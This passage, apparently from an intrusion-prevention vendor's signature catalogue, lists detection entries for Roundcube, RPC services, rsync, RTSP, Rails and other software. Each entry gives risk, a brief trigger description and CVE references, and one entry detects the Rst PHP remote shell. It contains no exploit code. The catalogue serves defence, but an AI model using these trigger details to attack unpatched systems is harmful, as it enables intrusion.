Description: A cross-site scripting vulnerability has been reported in Roundcube Webmail. The vulnerability is due to improper validation and sanitization of the incoming email messages by the rcube_washtml::wash_uri() method of rcube_washtml.php. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted email message to a target user. When the user accesses the Roundcube server to view the crafted email, the XSS condition will be triggered. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: SMTP_CS-Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting
File-TextId_Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting
References:
CVE-2023-5631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5631
Back to top

Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in RoundCube RoundCube Webmail
Risk: Moderate
First detected in: sgpkg-ips-1779-5242
Last changed: sgpkg-ips-1779-5242
Platform: Generic
Software: RoundCube Webmail
Type: Input Validation
Description: Insufficient validation and sanitization of attributes of the body HTML tag causes a cross-site scripting vulnerability in RoundCube Webmail. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: SMTP_CCS-Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting
File-Text_Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting
References:
CVE-2024-42009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42009
Back to top

Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008

About this vulnerability: A vulnerability in RoundCube Webmail
Risk: High
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Platform: Generic
Software: RoundCube Webmail
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Roundcube Webmail. The vulnerability is due to insufficient validation and sanitization of email attachments. A remote, unauthenticated attacker could exploit this vulnerability by sending the victim a crafted email. Successfully exploiting this vulnerability could result in sensitive information disclosure, and code execution in the context of the victim's browser.
Situation: File-Text_Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008
File-TextId_Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008
References:
CVE-2024-42008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42008
Back to top

Roundcube-Webmail-Linkref-Cross-Site-Scripting-CVE-2023-43770

About this vulnerability: A vulnerability in RoundCube Webmail
Risk: High
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Platform: Generic
Software: RoundCube Webmail
Type: Cross-site Scripting
Description: A cross site scripting vulnerability has been reported in RoundCube versions before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3. An unauthenticated attacker can exploit this vulnerability by enticing the target user into opening an email with a maliciously crafted link.
Situation: File-Text_Roundcube-Webmail-Linkref-Cross-Site-Scripting-CVE-2023-43770
References:
CVE-2023-43770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43770
Back to top

Roundcube-Webmail-RCE-Via-Config-Setting-CVE-2020-12641

About this vulnerability: An attempt to exploit a vulnerability in RoundCube Webmail detected
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: RoundCube Webmail
Type: Input Validation
Description: Roundcube Webmail before 1.4.4 allows attackers to execute arbitrary code via shell metacharacters in a configuration setting for "im_convert_path" or "im_identify_path".
Situation: HTTP_CRL-Roundcube-Webmail-ECE-Via-Config-Setting-CVE-2020-12641
References:
CVE-2020-12641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12641
Back to top

Roundcube-Webmail-SQL-Injection-CVE-2021-44026

About this vulnerability: An attempt to exploit a vulnerability in RoundCube Webmail detected
Risk: High
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1677-5242
Platform: Generic
Software: RoundCube Webmail
Type: Input Validation
Description: Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search_params.
Situation: HTTP_CSU-Roundcube-Webmail-SQL-Injection-CVE-2021-44026
References:
CVE-2021-44026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44026
Back to top

Roundcube-Webmail-SVG-Animate-Stored-Cross-Site-Scripting

About this vulnerability: An attempt to exploit a vulnerability in RoundCube Webmail
Risk: Moderate
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Platform: Generic
Software: RoundCube Webmail
Type: Input Validation
Description: Insufficient validation and sanitization of the animate HTML tag within an SVG file causes a cross-site scripting vulnerablity in RoundCube webmail. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: File-TextId_Roundcube-Webmail-SVG-Animate-Stored-Cross-Site-Scripting
References:
CVE-2024-37383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37383
Back to top

Roundcube-Webmail-XML-Attachment-Cross-Site-Scripting-CVE-2020-13965

About this vulnerability: A vulnerability in RoundCube Webmail
Risk: High
First detected in: sgpkg-ips-1816-5242
Last changed: sgpkg-ips-1816-5242
Platform: Generic
Software: RoundCube Webmail
Type: Cross-site Scripting
Description: A cross site scripting vulnerability has been reported in the RoundCube Webmail versions before 1.3.12 and 1.4.x before 1.4.5. An unauthenticated attacker can exploit this vulnerability by enticing the target user into previewing maliciously crafted XML content in an email attachment.
Situation: File-Text_Roundcube-Webmail-XML-Attachment-Cross-Site-Scripting-CVE-2020-13965
References:
CVE-2020-13965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13965
Back to top

Roxio-CinePlayer-Buffer-Overflow

About this vulnerability: A Roxio CinePlayer Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Roxio CinePlayer
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Roxio CinePlayer, version 3.2, which allows remote attackers to execute arbitrary code by setting an overly long value to DiskType.
Situation: File-Text_Roxio-CinePlayer-Buffer-Overflow
References:
CVE-2007-1559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1559
BID-23412
http://www.securityfocus.com/bid/23412
OSVDB-34779
http://www.osvdb.org/34779
Back to top

Roxy-WI-Unauthenticated-Command-Injection-RCE

About this vulnerability: A vulnerability in Roxy-WI.
Risk: High
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1499-5242
Platform: Generic
Software: Roxy-WI
Type: Input Validation
Description: A vulnerability in Roxy-WI, versions before 6.1.1.0, which allows remote attackers to execute arbitrary code by sending a crafted request to the target /app/options.py, due to the insufficient input validation of the ipbackend variable.
Situation: HTTP_CRL-Roxy-WI-Unauthenticated-Command-Injection-RCE
References:
CVE-2022-31137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31137
Back to top

RPC-BOF-MS03-049

About this vulnerability: Windows RPC Service Buffer Overflow MS03-049
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP
Software: RPC
Type: Buffer Overflow
Description: Microsoft Windows RPC Service contains a buffer overflow bug which can be triggered by sending a call to NetAddAlternateComputerName or NetValidateName (FAT only) with a large name argument. The buffer overflow allows the attacker to run code from a remote computer with system privileges.
Situation: Generic_MSRPC-WKSSVC-MS03-049
MSRPC-TCP_CPS-Rpc445-MS03-049
Generic_CS-Rpc445-MS03-049
References:
CVE-2003-0812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0812
BID-9011
http://www.securityfocus.com/bid/9011
MS03-049
http://technet.microsoft.com/security/bulletin/MS03-049
Back to top

RPC-CA-BrightStor-Arcserve-Backup-Caloggerd.exe-Null-Hostname-DOS

About this vulnerability: Denial of service vulnerability in the Computer Associates BrightStor ARCserve Backup caloggerd process
Risk: Moderate
First detected in: sgpkg-ips-109-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Malfunction
Description: There is a denial of service vulnerability in the Computer Associates BrightStor ARCserve Backup caloggerd process. A remote unauthenticated attacker can exploit this vulnerability by sending a malformed SUN RPC request that contains a specially crafted String Length field to the affected service, causing a denial of service.
Situation: SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Caloggerd.exe-Null-Hostname-DOS
References:
CVE-2007-2772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2772
BID-24017
http://www.securityfocus.com/bid/24017
OSVDB-35328
http://www.osvdb.org/35328
Back to top

RPC-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in Computer Associates BrightStor ARCserve Media Server
Risk: Moderate
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Malfunction
Description: There is a denial of service vulnerability in Computer Associates BrightStor ARCserve Media Server. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted SUN RPC request to the affected service, causing a denial of service.
Situation: SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Denial-Of-Service
References:
CVE-2007-2139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2139
BID-23635
http://www.securityfocus.com/bid/23635
OSVDB-34127
http://www.osvdb.org/34127
Back to top

RPC-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Service-BOF

About this vulnerability: Buffer overflow vulnerability in Computer Associates BrightStor ARCserve Media Server
Risk: High
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Media Server. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted SUN RPC request to the affected service, causing a denial of service or compromising the vulnerable system.
Situation: SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Service-BOF
References:
CVE-2007-2139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2139
BID-23635
http://www.securityfocus.com/bid/23635
OSVDB-34127
http://www.osvdb.org/34127
Back to top

RPC-Cde-Dtspcd-Buffer-Overflow

About this vulnerability: Buffer overflow in CDE
Risk: Critical
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Open Group CDE
Type: Buffer Overflow
Description: Command Desktop Environment (CDE), shipped by many Unix vendors, contains a buffer overflow vulnerability that can be exploited to execute arbitrary commands on the target host with root privileges.
Situation: Generic_RPC-Cde-Dtspcd-Buffer-Overflow
References:
CVE-2001-0803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0803
BID-3517
http://www.securityfocus.com/bid/3517
Back to top

RPC-CMSD-CREATE-Buffer-Overflow-Vulnerability

About this vulnerability: Buffer overflow in rpc.cmsd.
Risk: Critical
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: rpc.cmsd
Type: Buffer Overflow
Description: A buffer-overflow condition exists in rpc.cmsd provided by multiple vendors; by exploiting the vulnerability an attacker is able to remotely gain root access to the target.
Situation: Generic_SunRPC-CMSD-CREATE-Buffer-Overflow
References:
CVE-1999-0696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0696
BID-524
http://www.securityfocus.com/bid/524
Back to top

RPC-EMC-Legato-NetWorker-Remote-Exec-Service-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in EMC legato NetWorker
Risk: High
First detected in: sgpkg-ips-120-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC Legato NetWorker
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in EMC legato NetWorker. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted RPC message to the vulnerable server, to cause a denial of service condition or execute arbitrary code.
Situation: SunRPC_TCP-EMC-Legato-NetWorker-Remote-Exec-Service-Buffer-Overflow
References:
CVE-2007-3618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3618
BID-25375
http://www.securityfocus.com/bid/25375
OSVDB-39744
http://www.osvdb.org/39744
Back to top

RPC-Linux-Nfs_Mountd-Buffer-Overflow

About this vulnerability: Buffer overflow in nfs daemon.
Risk: Critical
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: rpc.mountd
Type: Buffer Overflow
Description: A buffer overflow condition in rpc.mountd can be exploited to execute arbitrary command on the target host with superuser privileges, even if the nfs server doesn't share anything.
Situation: Generic_RPC-Linux-Nfs-Mountd-Buffer-Overflow
References:
CVE-1999-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0002
BID-121
http://www.securityfocus.com/bid/121
Back to top

RPC-MIT-Kerberos-Kadmind-RPC-Library-Unix-Authentication-Buffer-Overflow

About this vulnerability: Buffer overflow in Kerberos Kadmind authentication library
Risk: High
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Buffer Overflow
Description: There is a remote exploitable buffer overflow vulnerability in the MIT Kerberos Kadmind RPC Library. The vulnerability can be exploited to gain a remote administrative access.
Situation: SunRPC_TCP-Kerberos-Kadmind-BOF
References:
CVE-2007-2443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2443
BID-24657
http://www.securityfocus.com/bid/24657
OSVDB-36597
http://www.osvdb.org/36597
Back to top

RPC-Portmapper-Access

About this vulnerability: Access to portmapper
Risk: Moderate
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: <os>
Type: Insecure Configuration
Description: Many RPC services are known to have security problems. Using portmapper, it is possible to query which RPC services are available on a host. This information as can reveal to an attacker whether there are any exploitable RPC services available.
Situation: Generic_UDP-SunRPC-Portmapper-Dump-Query
Generic_UDP-SunRPC-Portmapper-GetPort-Query
Generic_RPC-Nfs-Export-Query
SunRPC_RPC-Portmapper-Dump-Query
SunRPC_Nfs-Export-Query
SunRPC_Portmap-GetPort-Query
Back to top

RPC-sadmind-ADM-Method-BOF

About this vulnerability: Buffer overflow in Solstice AdminSuite's sadmind
Risk: High
First detected in: sgpkg-ips-181-2032
Last changed: sgpkg-ips-1296-5242
Platform: Solaris 8; Solaris 9
Software: RPC
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in Solstice AdminSuite's sadmind. The flaw is due to improper user input validation when processing RPC requests. A remote unauthenticated attacker can leverage this vulnerability by sending crafted RPC message to the target host, potentially inject and execute arbitrary code with root level privileges.
Situation: Generic_RPC-sadmind-ADM-Method-Buffer-Overflow
References:
CVE-2008-4556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4556
BID-31751
http://www.securityfocus.com/bid/31751
OSVDB-50019
http://www.osvdb.org/50019
Back to top

RPC-sadmind-BOF

About this vulnerability: Buffer overflow in sadmind
Risk: Critical
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Sun Solaris 2.6; Solaris 7
Software: RPC
Type: Buffer Overflow
Description: Daemon sadmind, which is shipped with certain versions of Solaris, contains a buffer overflow condition which can be exploited to remotely gain root access to the target.
Situation: Generic_RPC-sadmind-NETMGT-PROC-Service-Buffer-Overflow
References:
CVE-1999-0977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0977
BID-866
http://www.securityfocus.com/bid/866
OSVDB-2558
http://www.osvdb.org/2558
Back to top

RPC-Status-GHBN-Format-String-Vulnerability

About this vulnerability: Buffer overflow in rpc.statd
Risk: Critical
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: nfs-utils
Type: Format String
Description: A malicious user can exploit the logging functionality of the rpc.statd server to executable arbitrary code in the target system with root privileges.
Situation: Generic_RPC-Status-GHBN-Format-String
SunRPC_TCP-Nfs-Statd-Format-String
References:
CVE-2000-0666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0666
BID-1480
http://www.securityfocus.com/bid/1480
Back to top

RPC-ToolTalk-Access

About this vulnerability: Access to ToolTalk
Risk: High
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: <os>
Type: Insecure Configuration
Description: ToolTalk is an RPC-based messaging protocol. It is used in various Unix operating systems. While ToolTalk is not often used over a network, it is remotely accessible by default, and it has a long history of remote security vulnerabilities. Unless access to ToolTalk is specifically required, it is recommended to prevent remote access to ToolTalk.
Situation: SunRPC_TCP-ToolTalk-Access
Back to top

RPC-ToolTalk-Buffer-Overflow

About this vulnerability: RPC tooltalk buffer overflow
Risk: High
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: <os>
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the tooltalk service. Tooltalk is an rpc server and is part of the CDE desktop environment. The vulnerability can be remotely exploited and a successful exploit leads elevated remote system compromise. The exploitation of this vulnerability is easy as working attack tools are generally available.
Situation: SunRPC_TCP-ToolTalk-Buffer-Overflow
References:
CVE-1999-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0003
BID-122
http://www.securityfocus.com/bid/122
OSVDB-4505
http://www.osvdb.org/4505
Back to top

RPC-Ttdbserver-Format-String-Vulnerability

About this vulnerability: Format string vulnerability in rpc.ttdbserverd
Risk: Critical
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: CDE
Type: Format String
Description: ToolTalk database server, shipped with CDE by multiple vendors, contains a format string vulnerability which can be exploited by an attacker to execute arbitrary commands on the target host.
Situation: SunRPC_TCP-ToolTalk-Format-String
References:
CVE-2001-0717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0717
BID-3382
http://www.securityfocus.com/bid/3382
Back to top

RPC-Xdr-Array-Buffer-Overflow

About this vulnerability: Buffer overflow in various xdr implementations
Risk: Critical
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: rpc.cmsd; rpc.ttdbserverd
Type: Buffer Overflow
Description: Varous XDR implementations (SunRPC, libnsl, libc, glibc, etc..) are vulnerable to a buffer overflow condition, which can be exploited by an attacker to cause denial of service or to execute arbitrary commands on the system.
Situation: Generic_RPC-Xdr-Array-Buffer-Overflow-1
SunRPC_TCP-Xdr-Array-Buffer-Overflow-2
References:
CVE-2002-0391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0391
BID-5356
http://www.securityfocus.com/bid/5356
MS02-057
http://technet.microsoft.com/security/bulletin/MS02-057
Back to top

RPC-Yppasswd-Username-BOF

About this vulnerability: Username overflow in rpc.yppasswd
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: rpc.yppasswd
Type: Buffer Overflow
Description: The yppasswd command that allows users to change their NIS password has a buffer-overflow vulnerability, which can allow remote attackers to gain root privileges.
Situation: SunRPC_TCP-Yppasswd-Username-BOF
References:
CVE-2001-0779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0779
BID-2763
http://www.securityfocus.com/bid/2763
Back to top

RPC-Ypupdated-Arbitrary-Command-Execution

About this vulnerability: Arbitrary command execution in rpc.ypupdated
Risk: Critical
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: rpc.ypupdated
Type: Metacharacter Injection
Description: A command injection vulnerability in rpc.ypupdated, shipped by multiple vendors, allows an attacker to execute arbitrary commands with root privileges by injecting shell metacharacters to a crafted MAP UPDATE RPC request.
Situation: Generic_CS-RPC-Ypupdated-Arbitrary-Command-Execution
Generic_UDP-RPC-Ypupdated-Arbitrary-Command-Execution
References:
CVE-1999-0208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0208
BID-28383
http://www.securityfocus.com/bid/28383
Back to top

Rpcbind-Xdr-Parsing-Memory-Exhaustion-Denial-Of-Service

About this vulnerability: A vulnerability in Rpcbind libtirpc
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RPC
Type: Resource Starvation
Description: Improper parsing of rpc requests in rpcbind and libtirpc can cause an unbounded memory leak. A successful exploit allows a remote attacker to cause a denial of service condition on the target system.
Situation: Generic_UDP-Rpcbind-Xdr-Parsing-Memory-Exhaustion-Denial-Of-Service
References:
CVE-2017-8779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779
Back to top

Rpm-Package-Manager-Cpio-Header-Namesize-Integer-Overflow

About this vulnerability: A vulnerability in Red Hat RPM Package Manager
Risk: High
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Red Hat RPM Package Manager
Type: Integer Overflow
Description: A code execution vulnerability exists in RPM package manager. The vulnerability is due to an integer overflow when parsing the CPIO header in the payload section of an RPM file, leading to a stack buffer overflow. A remote attacker can exploit this vulnerability by enticing a user to install a maliciously modified signed RPM package. Successful exploitation could lead to arbitrary code execution.
Situation: File-Binary_Rpm-Package-Manager-Cpio-Header-Namesize-Integer-Overflow
References:
CVE-2014-8118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8118
BID-71588
http://www.securityfocus.com/bid/71588
OSVDB-115602
http://www.osvdb.org/115602
Back to top

RSA-Authentication-Web-Agent-Request

About this vulnerability: Detects the usage of RSA Security RSA Authentication Agent For Web for IIS
Risk: Low
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RSA Security RSA Authentication for Web for IIS
Type: Malfunction
Description: This fingerprint detects web requests made for RSA Authentication IIS Web Agent.
Situation: HTTP_CSU-RSA-Authentication-Web-Agent-Request
Back to top

RSH-Authentication-Scanner-Vulnerability

About this vulnerability: An RSH Authentication Scanner vulnerability.
Risk: High
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: rsh
Type: Insecure Configuration
Description: An rsh shell service test which locates Unix accounts that have a default, null, blank, or missing password.
Situation: Generic_CS-RSH-Authentication-Scanner-Vulnerability
References:
CVE-1999-0651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0651
Back to top

Rst-Malware

About this vulnerability: Rst malware
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Any Software
Type: Post Compromise Behaviour
Description: Rst, also known as r52shell, is a remote control program written in PHP scripting language. It is often installed to compromised Linux systems.
Situation: HTTP_SS-Rst-Malware
File-Text_Rst-Malware
Back to top

RSYNC-Backup-Dir-Directory-Traversal

About this vulnerability: Insecurely configured rsyncd allows file import
Risk: High
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: rsync
Type: Directory Traversal
Description: If rsync daemon is installed with read/write enabled and without chroot option, an attacker can remotely write files outside of the configured path.
Situation: Generic_CS-RSYNC-Arbitrary-File-Overwriting
References:
CVE-2004-0426
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0426
BID-10247
http://www.securityfocus.com/bid/10247
Back to top

Rsync-Receive_Xattr-Heap-Based-Buffer-Overread

About this vulnerability: A vulnerability in rsync Project rsync
Risk: Moderate
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rsync
Type: Malfunction
Description: Improper parsing of non-null-terminated strings in rsync causes a buffer overread vulnerability. A successful exploit can cause a denial of service condition on the target.
Situation: Generic_CS-Rsync-Receive_Xattr-Heap-Based-Buffer-Overread
References:
CVE-2017-16548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16548
Back to top

Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service

About this vulnerability: A vulnerability in Infodrom Oldenburg sysklogd
Risk: Moderate
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: rsyslog
Type: Integer Overflow
Description: A denial of service vulnerability exists in rsyslog and sysklogd. The vulnerability is due to an integer overflow when handling PRI values larger than MAX_INT in log messages. This issue is due to an incomplete fix for CVE-2014-3634. A remote, unauthenticated attacker can exploit these vulnerabilities by sending crafted packets to an affected service. Successful exploitation could result in a denial of service condition.
Situation: Generic_CS-Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service
Generic_UDP-Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service
References:
CVE-2014-3683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3683
OSVDB-112596
http://www.osvdb.org/112596
Back to top

RTF-File-Listid-Use-After-Free-Vulnerability

About this vulnerability: A vulnerability in Microsoft Word
Risk: Moderate
First detected in: sgpkg-ips-484-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: A vulnerability in Microsoft Word may allow code execution
Situation: File-RTF_RTF-File-Listid-Use-After-Free-Vulnerability
References:
CVE-2012-2528
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2528
BID-55781
http://www.securityfocus.com/bid/55781
MS12-064
http://technet.microsoft.com/security/bulletin/MS12-064
Back to top

RTSP-Describe-Request-Long-URI-Header

About this vulnerability: Very Long URI Header detected in RTSP-request
Risk: Low
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Any Software
Type: Malfunction
Description: A suspiciously long URI was detected in an RTSP DESCRIBE request method. This may suggest a buffer overflow attempt, such as CVE-2002-1643.
Situation: Generic_CS-RTSP-Describe-Request-Long-URI-Header
Back to top

RTSP-Protocol-Usage

About this vulnerability: RTSP (Real-Time Streaming Protocol) usage
Risk: Moderate
First detected in: sgpkg-ips-47-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Streaming Media
Description: RTSP, Real-Time Streaming Protocol, is used to broadcast audio and video streams over IP networks.
Situation: Shared_RTSP-Protocol-Usage
Back to top

RTSP-RealNetworks-Helix-DNA-Server-Require-Header-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in RealNetworks Helix DNA servers request handling code
Risk: Moderate
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix DNA Server
Type: Buffer Overflow
Description: RealNetworks Helix DNA Server does not parse RTSP requests correctly. An RTSP request containing multiple Request header fields can cause memory corruption, and possibly allow arbitrary code execution on the server.
Situation: Generic_RTSP-RealNetworks-Helix-DNA-Server-Require-Header-Buffer-Overflow
References:
CVE-2007-4561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4561
BID-25440
http://www.securityfocus.com/bid/25440
Back to top

RTSP-RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in RealNetworks Helix Server
Risk: High
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealNetworks Helix Universal Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in RealNetworks Helix Server. By sending an RTSP DESCRIBE request with a crafted LoadTestPassword header value to the vulnerable RealNetworks Helix Server RTSP service, a remote attacker can cause a denial of service or execute arbitrary code on the target host.
Situation: Generic_UDP-RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow
Generic_RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow
References:
CVE-2006-6026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6026
BID-21141
http://www.securityfocus.com/bid/21141
Back to top

Ruby-On-Rails-Action-View-Mime-DOS

About this vulnerability: A Ruby On Rails Action View Mime DOS vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ruby on Rails
Type: Input Validation
Description: A vulnerability in Ruby on Rails, versions 3.x before 3.2.16 and 4.x before 4.0.2, which allows remote attackers to cause a denial of service condition by sending a header containing an long MIME type.
Situation: HTTP_CSH-Very-Long-Accept-Header
References:
CVE-2013-6414
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6414
BID-64074
http://www.securityfocus.com/bid/64074
OSVDB-100525
http://www.osvdb.org/100525
Back to top

Ruby-On-Rails-Activestorage-Insecure-Deserialization

About this vulnerability: A vulnerability in Ruby on Rails
Risk: Moderate
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ruby on Rails
Type: Input Validation
Description: There has been reported an insecure deserialization vulnerability in Ruby on Rails. This vulnerability could be exploited remotely by an unauthenticated attacker. Succesful exploitation might lead in arbitrary code execution.
Situation: HTTP_CRL-Ruby-On-Rails-Activestorage-Insecure-Deserialization
References:
CVE-2019-5420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5420
Back to top

Ruby-On-Rails-Devise-Password-Reset

About this vulnerability: A Ruby On Rails Devise Password Reset vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ruby on Rails
Type: Insecure Configuration
Description: A vulnerability in the Ruby On Rails Devise gem, versions before 2.2.3, before 2.1.3, before 2.0.5, before 1.5.4, allow remote attackers to bypass security checks and reset passwords to arbitrary accounts due to improper type conversion when performing database queries.
Situation: HTTP_CS-Ruby-On-Rails-Devise-Password-Reset
References:
CVE-2013-0233
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0233
BID-57577
http://www.securityfocus.com/bid/57577
OSVDB-89642
